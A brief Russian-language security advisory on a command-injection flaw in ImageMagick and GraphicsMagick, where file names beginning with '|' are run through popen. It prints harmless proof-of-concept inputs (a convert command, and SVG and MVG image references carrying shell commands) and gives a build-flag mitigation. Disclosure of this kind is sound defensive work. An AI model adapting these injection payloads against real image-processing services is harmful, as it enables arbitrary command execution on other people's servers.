В пакетах ImageMagick и GraphicsMagick опять обнаружена новая опасная уязвимость, которая позволяет выполнять различные shell-команды при обработке файлов со спец.именами. На сей раз, брешь затрагивает отсутствии проверки имени файлов на существование спец.символов.

Передав вместо имени файла аргумент "|имя" можно выполнить произвольный код, например:

convert '|echo Hello > hello.txt;' null:

Также как и в предыдущей уязвимости, существует возможность провести атаку, используя специально сформированных SVG-файлов и MVG-файлов, в которых вместо ссылки на изображение может применяться конструкция:

SVG:

   xlink:href="|echo Hello > hello.txt; cat /usr/lib/firefox/browser/icons/mozicon128.png"

MVG:

  push graphic-context
  viewbox 0 0 640 480
  image copy 200,200 100,100 "|echo Hello > hello.txt; cat /usr/lib/firefox/browser/icons/mozicon128.png"
  pop graphic-context

На данный момент, обновления пакетов для различных дистрибутивов (Debian, Ubuntu, SUSE, FreeBSD, Fedora итд) ещё не подготовлены. Исправления доступны лишь в виде патча. Потому, в целях уменьшения воздействий и избежания проблем, пока что рекомендуется выключить использование фун-ции popen, убрав флаг HAVE_POPEN в файле magick/blob.c ("#undef HAVE_POPEN").